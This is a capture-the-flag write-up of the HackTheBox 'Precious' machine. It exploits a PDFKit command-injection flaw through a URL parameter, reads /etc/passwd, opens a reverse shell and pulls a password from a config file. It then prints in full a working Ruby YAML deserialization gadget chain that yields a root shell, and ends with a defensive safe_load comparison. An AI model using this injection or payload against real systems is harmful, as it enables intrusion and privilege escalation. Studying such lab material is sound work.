Precious
Enumeration
Ports and Services
Software Installed:
Nmap Scan Results:
Homepage:
http://precious.htb/
It seems you enter a URL and the site converts that page to a PDF:
Created a test page and entered its URL:
Initial Foothold
Downloaded the PDF and looked at its metadata:
PDFKit Vulns
https://nvd.nist.gov/vuln/detail/CVE-2022-25765
https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
Putting in http://10.10.14.36/?name=%20id
/etc/passwd
Looks like python3 is installed. Checked for nc, php and python: no luck.
Reverse shell with python3:
Henry's password found in /home/ruby/.bundle/config
User.txt Proof Screenshot
Privilege Escalation
sudo -l
It seems to be a version check that uses YAML:
Found a YAML deserialization attack:
https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565#file-ruby_yaml_load_sploit2-yaml
Copied the contents of ruby_yaml_load_sploit2.yaml into dependencies.yml and executed it:
```yaml
---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: /bin/bash
         method_id: :resolve
```
This executed a bash shell as root.
Root Proof Screenshot Here:
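The root cause of the privilege escalation above is the version check loading a user-writable YAML file with a full (object-reviving) loader. The Ruby below is an added example, not code from the box or the gist: it contrasts that vulnerable pattern with `YAML.safe_load`, using a constructed `dependencies.yml` and a harmless `Canary` class in place of the `Gem::*` gadgets, so the behaviour can be observed without any payload.

```ruby
require 'yaml'

# Constructed sample: what a legitimate dependencies.yml for the version check
# might look like (an assumption; the page does not show the real file).
BENIGN_YAML = <<~YAML
  ---
  pdfkit: 0.8.6
  yaml: "4.0"
YAML

# Harmless stand-in for the Gem::* classes named in the page's payload: if the
# loader revives this object from a tag, it would revive any class the same way.
class Canary
  attr_accessor :note
end

TAGGED_YAML = <<~YAML
  ---
  - !ruby/object:Canary
    note: instantiated by the YAML loader
YAML

# Vulnerable pattern: a full load resolves !ruby/object tags into live objects.
# Psych 4 (Ruby 3.1+) moved this behaviour to unsafe_load; older Psych does it
# from plain YAML.load, which is what a typical version-check script calls.
def unsafe_version_check(text)
  YAML.respond_to?(:unsafe_load) ? YAML.unsafe_load(text) : YAML.load(text)
end

# Hardened pattern: safe_load builds only scalars, arrays and hashes (plus any
# classes explicitly permitted) and raises on tagged objects and aliases, so the
# gadget chain in dependencies.yml is rejected before any object is created.
def safe_version_check(text)
  YAML.safe_load(text, permitted_classes: [], aliases: false)
end

# Returns :rejected if the loader refuses the tagged input, :instantiated if it
# built a Canary, and :data for plain configuration values.
def classify(loader, text)
  result = send(loader, text)
  result.is_a?(Array) && result.first.is_a?(Canary) ? :instantiated : :data
rescue Psych::DisallowedClass, Psych::BadAlias
  :rejected
end

if __FILE__ == $PROGRAM_NAME
  puts "unsafe loader on tagged input: #{classify(:unsafe_version_check, TAGGED_YAML)}"
  puts "safe loader on tagged input:   #{classify(:safe_version_check, TAGGED_YAML)}"
  puts "safe loader on benign input:   #{classify(:safe_version_check, BENIGN_YAML)}"
end
```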